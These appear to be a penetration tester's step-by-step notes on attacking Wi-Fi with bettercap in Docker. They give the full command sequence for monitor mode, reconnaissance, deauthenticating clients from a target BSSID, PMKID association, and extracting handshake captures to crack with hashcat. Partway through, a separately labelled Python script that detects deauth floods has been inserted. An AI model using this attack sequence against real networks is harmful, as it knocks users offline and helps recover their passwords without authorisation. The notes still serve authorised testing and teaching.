
bettercap

Notes: totally under construction while I review bettercap's CLI and see what's still relevant.

Connect USB wifi to ESXi/Proxmox

In ESXi, shut down the host, then add a new USB device and choose "Realtek 802.11n NIC"

Kill processes on the Kali VM that might screw stuff up:

airmon-ng check kill

Start monitoring on the wifi card

sudo airmon-ng start wlan0

Start bettercap

sudo docker run -it --privileged --net=host bettercap/bettercap -iface wlan0

Set wifi capture file (warning: if you don't set this now and want to change it, you have to RESTART the wifi recon function)

set wifi.handshakes.file /root/captures.pcap

Set wifi.deauth.acquired to true (optional)

What I found during testing is that I would capture a lot of "half" handshakes but never the full ones. After reading this GitHub [issue](https://github.com/bettercap/bettercap/issues/889) I tried setting "set wifi.deauth.acquired true" and then I started getting full handshakes!

set wifi.deauth.acquired true

Get wifi recon going!

wifi.recon on

Sort networks by # of clients connected

set wifi.show.sort clients desc

Every second, clear out our view and then present an updated list of nearby WiFi networks:

set ticker.commands 'clear; wifi.show'

Filter out client probes

events.ignore wifi.client.probe

Filter out client disconnections

events.ignore wifi.client.lost

Filter out new APs that come online

events.ignore wifi.ap.new

Filter out new clients that come online

events.ignore wifi.client.new

Filter out lost connections with APs

events.ignore wifi.ap.lost

Show networks that ONLY start with 7MS:

set wifi.show.filter ^7MS

Turn on ticker

ticker on

Set channel to the one you're attacking

wifi.recon.channel X

Disassociate all clients on a given BSSID to capture handshakes!

wifi.deauth 11:22:33:44:55:66
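As an added example (not from these notes or from bettercap), here is a small defender-side Python script that reads a pcap of raw 802.11 frames and flags any transmitter sending a burst of deauthentication frames, which is what the wifi.deauth step above looks like to the AP owner or a wireless IDS. It assumes link type 105 (raw 802.11 without a radiotap header); the sample capture is constructed inline.

```python
import struct
from collections import Counter

DLT_IEEE802_11 = 105      # raw 802.11 frames, no radiotap header (assumption of this example)
DEAUTH = (0, 12)          # management frame (type 0), subtype 12 = deauthentication

def parse_pcap(pcap: bytes):
    """Yield each captured frame from a classic (non-ng) pcap of link type 105."""
    magic, = struct.unpack("<I", pcap[:4])
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    linktype, = struct.unpack(endian + "I", pcap[20:24])
    assert linktype == DLT_IEEE802_11, "example only handles DLT_IEEE802_11 (105)"
    off = 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        off += 16
        yield pcap[off:off + incl_len]
        off += incl_len

def frame_info(frame: bytes):
    """Return (type, subtype, transmitter address) from the 802.11 MAC header."""
    fc = frame[0]                            # frame control, first byte
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    addr2 = ":".join(f"{b:02x}" for b in frame[10:16])   # transmitter (addr2)
    return ftype, subtype, addr2

def deauth_floods(pcap: bytes, threshold: int = 10):
    """Count deauth frames per transmitter; return those at or above threshold."""
    counts = Counter()
    for frame in parse_pcap(pcap):
        ftype, subtype, src = frame_info(frame)
        if (ftype, subtype) == DEAUTH:
            counts[src] += 1
    return {src: n for src, n in counts.items() if n >= threshold}

# --- constructed sample capture (not a real recording) ---------------------
def _mgmt_frame(subtype, addr1, addr2, addr3, body=b""):
    fc = bytes([(subtype << 4) & 0xFF, 0])   # type 0 (management), given subtype
    return fc + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body

def _pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, DLT_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out

AP, CLIENT, BCAST = bytes.fromhex("112233445566"), bytes.fromhex("aabbccddeeff"), b"\xff" * 6
SAMPLE = _pcap([_mgmt_frame(8, BCAST, AP, AP)]                        # one beacon
               + [_mgmt_frame(12, BCAST, AP, AP, b"\x07\x00")] * 20   # 20 broadcast deauths
               + [_mgmt_frame(12, AP, CLIENT, AP, b"\x03\x00")])      # one client leaving normally
```

A real AP sends a handful of deauths over a day, so twenty broadcast deauths in one short window from the AP's own address is the signature worth alerting on; the single client-originated deauth stays below the threshold.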

Assoc with target SSID to do the PMKID attack

wifi.assoc all

-or-

wifi.assoc 11:22:33:44:55:66

Clear SSID filter

set wifi.show.filter ^

Clear wifi.recon.channel filter

wifi.recon.channel clear

Figure out the container ID for bettercap

sudo docker ps

Copy files from docker to hard drive

First, make note of the ID (noted with "XXX" below). If you didn't change the default path, you should be able to see captured files in the /root folder. Try listing them with:

sudo docker exec XXX ls /root/

Now you can copy them out of the docker and into your current folder:

sudo docker cp XXX:/root/captures.pcap .

Convert .pcap files to hccapx files

sudo /usr/lib/hashcat-utils/cap2hccapx.bin wifi-handshakes.pcap wifi-handshakes-converted.hccapx

Crack w/hashcat!

sudo /path/to/hashcat -m2500 converted-file.hccapx wordlist.txt

If the command above doesn't work, it looks like the new standard hash type might be m22000 per this article. In that case, here's what I did on the pcap itself to get it ready for hashcat:

sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap

One time I had problems with my .cap file from bettercap and had to do this to clean it up:

tshark -r my-cap-file-from-bettercap.cap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng

Then convert from .pcapng to .pcap

editcap -F pcap stripped.pcapng stripped.pcap